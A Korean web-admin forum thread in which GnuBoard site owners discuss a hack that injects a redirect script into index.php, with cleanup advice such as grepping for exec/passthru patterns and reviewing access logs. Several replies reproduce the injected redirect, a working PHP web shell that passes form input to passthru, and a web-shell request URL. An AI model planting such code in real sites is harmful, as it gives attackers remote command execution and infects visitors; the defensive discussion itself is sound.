해킹을 당했습니다. 답변좀 주세요.ㅜㅜ 정보
해킹을 당했습니다. 답변좀 주세요.ㅜㅜ본문
어제 갑자기 index.php의 최상단에 아래소스가 심어져 있었습니다.
<script>parent.document.location.href='http://사이트주소';</script>
그래서 지웠습니다. 근데 보니깐 bbs 폴더가 777입니다. 그폴더안에 보니깐
이상한 파일들이 있어서 다 지웠습니다. bbs폴더는 755로 변경했습니다.
어느정도 시간이 지난후 다시 index.php파일에 소스가 심어져있습니다.
ㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜ
bbs폴더도 755로 변경했고요. ftp패스워드 변경했는데도 그러네요.
답변좀 주세요.
<script>parent.document.location.href='http://사이트주소';</script>
그래서 지웠습니다. 근데 보니깐 bbs 폴더가 777입니다. 그폴더안에 보니깐
이상한 파일들이 있어서 다 지웠습니다. bbs폴더는 755로 변경했습니다.
어느정도 시간이 지난후 다시 index.php파일에 소스가 심어져있습니다.
ㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜ
bbs폴더도 755로 변경했고요. ftp패스워드 변경했는데도 그러네요.
답변좀 주세요.
댓글 전체
저도 걸렸었는데요. 모든 index.php 다 수정되있더라구요.... 여기저기 index.php 되게 많아요. . ftp 비번도 수정해야하고 pdf 프로그램도 최신으로 업데이트 해야 해요. 이걸통해 해킹한다고 그러데요. 저는 index.php 파일을 404 권한으로 해놨어요. 사이트 들어오신분 모두 바이러스 걸리더라구요.. ㅠ.ㅠ 중국사이트어디던데...
답변 감사합니다.
제가 당해서 2달동안 고생했던 수법이군요.
위에분이 말씀하신 것처럼 모종의 방법으로 ftp에 접속해서 한번만 해놓고 끝내기도 하지만 지속적으로 공격할려고 계정 어딘가에 웹셀프로그램을 업로드 하였을 가능성이 큽니다.
ftp로 접속을 안해도 게시판의 업로드 기능을 이용하여
/data/ 폴더 어딘가에 웹셀프로그램을 업로드 한 뒤에 해당 프로그램에 접근하여 파일을 변조하기도 합니다.
ssh상에서 find 명령 가능하시면
# find /home디렉토리/ -name *.php | xargs grep ‘패턴’
패턴 system, exec, passthru, escapeshellcmd, pcntl_exec, shell_exec
이런식으로 패턴 검색하시면 /data 폴더내에 수상한 파일이 나올겁니다.
보통 /data/member 의 멤버 아이콘이나 /data/file/의 게시판 업로드, /data/cheditor, /data/geditor 등 에디터의 업로드 기능을 이용하여 업로드 하는 걸겁니다.
그외에 기본 퍼미션이 707이나 777로 되어 있어서 파일을 업로드 가능한 폴더를 전부 찾아보셔야 할겁니다.
제가 당한 프로그램이름은 phpspy라는 중국산 프로그램이였습니다.
수상한 파일 찾아서 메모장으로 확인하시면 '궷쭹ㅤㅂㅞㄺ' 같은 외계어로 된 파일이 웹셀프로그램입니다.
위에분이 말씀하신 것처럼 모종의 방법으로 ftp에 접속해서 한번만 해놓고 끝내기도 하지만 지속적으로 공격할려고 계정 어딘가에 웹셀프로그램을 업로드 하였을 가능성이 큽니다.
ftp로 접속을 안해도 게시판의 업로드 기능을 이용하여
/data/ 폴더 어딘가에 웹셀프로그램을 업로드 한 뒤에 해당 프로그램에 접근하여 파일을 변조하기도 합니다.
ssh상에서 find 명령 가능하시면
# find /home디렉토리/ -name *.php | xargs grep ‘패턴’
패턴 system, exec, passthru, escapeshellcmd, pcntl_exec, shell_exec
이런식으로 패턴 검색하시면 /data 폴더내에 수상한 파일이 나올겁니다.
보통 /data/member 의 멤버 아이콘이나 /data/file/의 게시판 업로드, /data/cheditor, /data/geditor 등 에디터의 업로드 기능을 이용하여 업로드 하는 걸겁니다.
그외에 기본 퍼미션이 707이나 777로 되어 있어서 파일을 업로드 가능한 폴더를 전부 찾아보셔야 할겁니다.
제가 당한 프로그램이름은 phpspy라는 중국산 프로그램이였습니다.
수상한 파일 찾아서 메모장으로 확인하시면 '궷쭹ㅤㅂㅞㄺ' 같은 외계어로 된 파일이 웹셀프로그램입니다.
답변 감사합니다.
일반 호스팅이여서 find명령이 안되신다면 tar로 data폴더 포함해서 전부 압축해서 다운 받으신 뒤
울트라에디트의 특정 폴더내의 파일들에서 문자열 검색하는 기능으로 해당 패턴들을 검색해보시면 됩니다.
아마 Find In Files라는 메뉴일겁니다.
울트라에디트의 특정 폴더내의 파일들에서 문자열 검색하는 기능으로 해당 패턴들을 검색해보시면 됩니다.
아마 Find In Files라는 메뉴일겁니다.
/www/data/cheditor4 폴더에 확장자 없는 어떤 파일에서 아래 내용이 발견되었습니다.
?
echo "
<FORM ACTION=$PHP_SELF METHOD=POST>
CMD : <INPUT TYPE=TEXT NAME=command SIZE=40>
<INPUT TYPE=SUBMIT VALUE='Enter'></FORM>
<HR>\n<XMP>\n$result\n</XMP><HR>";
$command = str_replace("\\", "", $command);
echo "<XMP>"; passthru($command); echo "</XMP>";
?>
저거 지웠어요. 이제 이상없겠죠???
?
echo "
<FORM ACTION=$PHP_SELF METHOD=POST>
CMD : <INPUT TYPE=TEXT NAME=command SIZE=40>
<INPUT TYPE=SUBMIT VALUE='Enter'></FORM>
<HR>\n<XMP>\n$result\n</XMP><HR>";
$command = str_replace("\\", "", $command);
echo "<XMP>"; passthru($command); echo "</XMP>";
?>
저거 지웠어요. 이제 이상없겠죠???
맞을겁니다.
그 폴더에는 index.php나 이미지 파일 외에는 올라가면 안되거든요.
그리고 엑세스 로그도 확인해보시면 좋습니다.
# cat /usr/local/apache/logs/access_log | grep 문제가 된 파일명
이렇게 하시면 해당 파일에 접근한 기록이 나옵니다. 해당 파일에 접근한 아이피가 뜨면 이젠
# cat /usr/local/apache/logs/access_log | grep 아이피
로 검색하시면 해당 아이피가 접근한 모든 파일 목록이 뜹니다.
저는 이렇게 해서 똑같은 파일을 하나 더 발견했습니다.파일명이랑 확장자를 교묘하게 바꿔서 못찾았더라고요.
호스팅 사용하시면 해당 호스팅사에 파일주소 알려주시고 그 파일에 접근한 아이피랑 해당 아이피가 접근한 파일목록을 보내달라고 요청해보세요.
그 폴더에는 index.php나 이미지 파일 외에는 올라가면 안되거든요.
그리고 엑세스 로그도 확인해보시면 좋습니다.
# cat /usr/local/apache/logs/access_log | grep 문제가 된 파일명
이렇게 하시면 해당 파일에 접근한 기록이 나옵니다. 해당 파일에 접근한 아이피가 뜨면 이젠
# cat /usr/local/apache/logs/access_log | grep 아이피
로 검색하시면 해당 아이피가 접근한 모든 파일 목록이 뜹니다.
저는 이렇게 해서 똑같은 파일을 하나 더 발견했습니다.파일명이랑 확장자를 교묘하게 바꿔서 못찾았더라고요.
호스팅 사용하시면 해당 호스팅사에 파일주소 알려주시고 그 파일에 접근한 아이피랑 해당 아이피가 접근한 파일목록을 보내달라고 요청해보세요.
근데 index.php이나 이미지파일이 아닌 악성파일을 어캐 올렸죠? 참고로 그누보드 2010년2월
버전입니다.
버전입니다.
ftp접속 정보가 유출되서 ftp로 올렸거나 아니면
그누보드가 파일 업로드시 이미지파일인지 검증하게 패치 된걸로는 알고 있지만 cheditor에 올라간걸 보니 cheditor 업로드에 문제가 있을 수도 있습니다.
cheditor의 업로드 기능을 막으시는 것이 좋을 듯 합니다.
그누보드가 파일 업로드시 이미지파일인지 검증하게 패치 된걸로는 알고 있지만 cheditor에 올라간걸 보니 cheditor 업로드에 문제가 있을 수도 있습니다.
cheditor의 업로드 기능을 막으시는 것이 좋을 듯 합니다.
그리고 파일을 지웠다고 안심하지 마시고 한동안은 철저하게 모니터링 하세요.
또 같은 현상이 나타난다면 아직 파일이 남아있는 겁니다.
보니까 웹셀에 업로드 기능도 있어서 또 다른곳에 파일을 심어놓을 수도 있으니 다시 문제가 발생하시면 전체적으로 다시 검사를 해보셔야 합니다.
또 같은 현상이 나타난다면 아직 파일이 남아있는 겁니다.
보니까 웹셀에 업로드 기능도 있어서 또 다른곳에 파일을 심어놓을 수도 있으니 다시 문제가 발생하시면 전체적으로 다시 검사를 해보셔야 합니다.
루시올라님도 그누보드 쓰시나요?
네, 그러니까 여기서 놀고 있죠^^
벌써 그누보드만 사용한지 4년정도 ㅤㄷㅚㅆ네요.
그런데 제트스윙님 혹시 제트센스 운영자분이신가요?
벌써 그누보드만 사용한지 4년정도 ㅤㄷㅚㅆ네요.
그런데 제트스윙님 혹시 제트센스 운영자분이신가요?
네 맞습니다. 많은 도움이 되었습니다.^^
도움이 되셨다니 다행이네요.
그리고보니 제가 당한게 1,2월이였는데...그누보드 최신으로 업데이트 하는 것도 잊지마세요^^
그리고보니 제가 당한게 1,2월이였는데...그누보드 최신으로 업데이트 하는 것도 잊지마세요^^
저두 예전에 당했었는데....ftp쪽만 몇일 봐두 않되더니....
알고보니깐 제 경우엔 제 컴퓨터 ftp프로그램에 비밀번호 저장해서 그렇더군요...
의심되는 파일 다 삭제하고 ftp비밀번호 수정하고 ftp프로그램에서 비밀번호 저장하지 않았더니 해결 됐었어요..
알고보니깐 제 경우엔 제 컴퓨터 ftp프로그램에 비밀번호 저장해서 그렇더군요...
의심되는 파일 다 삭제하고 ftp비밀번호 수정하고 ftp프로그램에서 비밀번호 저장하지 않았더니 해결 됐었어요..
아 정말 죽겠네요. 관리하는 사이트중 최근에 3개가 거의 동시에 해킹을 당했습니다. perl 화일을 업로드해서 실행하는 방법으로 해킹을 당했습니다. 계속해서 서버 회사에서는 메일이 오고 하네요. 화일은 지웠는데도 perl 프로그램이 실행 되는거 같습니다. 혹시 perl의 실행 log를 확인 할 수 있는 명령어가 있을까요?
저도 루크님과 같은 경우 인데요....근본적인 해결방법은 다음과 같습니다.
일단 모든 방법을 동원해서 내 컴퓨터 깨끗하게 합니다. 드림위버 같은 프로그램으로 FTP 접속하시면서 FTP정보 저장 해놓으면 내 컴이 악성코드에 감염되어 그 정보 해커들이 가져다가 지들이 노는 곳에 확 뿌려 버립니다. 이넘 저넘 다 들어와서 연습도 하고 정보도 빼내어 갑니다. 무섭죠? -.-
글구 차후 절대 FTP나 정보 내컴에 저장하지 마세요..되도록 드림위버 같은거 불법으로 다운받아 쓰지 마세요....
기존 사이트에 올라가 있는 화일들 다 백업 받아 저장해 놓습니다. 악성코드나 바이러스 있는지 스캔 합니다.
그누보드 최근버전으로 다시 설치 하고 백업 받아 놓은 자료에서 필요한것 있으면 하나 하나 수작업으로 확인해서 업데이트 합니다.
그누보드에 자주 접속해 최신 패치들 업데이트 해줍니다. 그리고 신종해킹 피해들 확인하고 내 사이트 모니터링 합니다.
나모웹에서는 FTP IP지정해서 그이외 아이피로는 FTP접속을 원천적으로 못하게 막아버리기도 하더군요....
암튼 정말 피해 막심합니다....잘못해서 회원정보가 악용되면 처벌도 되는것 같던데 조심 또 조심해야 할것 같아요....
작업하는 컴퓨터는 꼭 필요한 사이트 제외하고 접속을 원천적으로 하지 않는게 좋습니다. 악성코드중에 아이프레임으로 걸어서 사이트 접속만으로 악성코드가 감염되고 전파되고 하더군요....나도 모르는 사이에 감염될 확율이 높으니 작업하시는 컴에서는 필요한 사이트외에는 접속을 아예 하지 않는것도 좋은 예방법 같더라구요.....
요즘도 접속자들 분석해 보면 중국넘들이 계속 뭔가 시도하고 있어요.....뭔지 몰라 아이피는 계속 차단하는데 러시아나 말레이시아 이런데로 경유해서 들어오는데 정말 신경쓰이네요...
일단 모든 방법을 동원해서 내 컴퓨터 깨끗하게 합니다. 드림위버 같은 프로그램으로 FTP 접속하시면서 FTP정보 저장 해놓으면 내 컴이 악성코드에 감염되어 그 정보 해커들이 가져다가 지들이 노는 곳에 확 뿌려 버립니다. 이넘 저넘 다 들어와서 연습도 하고 정보도 빼내어 갑니다. 무섭죠? -.-
글구 차후 절대 FTP나 정보 내컴에 저장하지 마세요..되도록 드림위버 같은거 불법으로 다운받아 쓰지 마세요....
기존 사이트에 올라가 있는 화일들 다 백업 받아 저장해 놓습니다. 악성코드나 바이러스 있는지 스캔 합니다.
그누보드 최근버전으로 다시 설치 하고 백업 받아 놓은 자료에서 필요한것 있으면 하나 하나 수작업으로 확인해서 업데이트 합니다.
그누보드에 자주 접속해 최신 패치들 업데이트 해줍니다. 그리고 신종해킹 피해들 확인하고 내 사이트 모니터링 합니다.
나모웹에서는 FTP IP지정해서 그이외 아이피로는 FTP접속을 원천적으로 못하게 막아버리기도 하더군요....
암튼 정말 피해 막심합니다....잘못해서 회원정보가 악용되면 처벌도 되는것 같던데 조심 또 조심해야 할것 같아요....
작업하는 컴퓨터는 꼭 필요한 사이트 제외하고 접속을 원천적으로 하지 않는게 좋습니다. 악성코드중에 아이프레임으로 걸어서 사이트 접속만으로 악성코드가 감염되고 전파되고 하더군요....나도 모르는 사이에 감염될 확율이 높으니 작업하시는 컴에서는 필요한 사이트외에는 접속을 아예 하지 않는것도 좋은 예방법 같더라구요.....
요즘도 접속자들 분석해 보면 중국넘들이 계속 뭔가 시도하고 있어요.....뭔지 몰라 아이피는 계속 차단하는데 러시아나 말레이시아 이런데로 경유해서 들어오는데 정말 신경쓰이네요...
아 최근에 패치를 했는데도 아래와 같은 코드로 해킹 당했습니다. ㅠㅠ
/skin/outlogin/basic/outlogin.skin.php?act=ls&d=%2Fhome%2F
혹시 기본 스킨들에도 무슨 문제가 있나요?
/skin/outlogin/basic/outlogin.skin.php?act=ls&d=%2Fhome%2F
혹시 기본 스킨들에도 무슨 문제가 있나요?
이거 폴더권한이 707인것만 찾아서 업로드를 통해서 들어옵니다.
어떻게 해야될지 막막합니다. 아시는분 처방전좀 주세요.
어떻게 해야될지 막막합니다. 아시는분 처방전좀 주세요.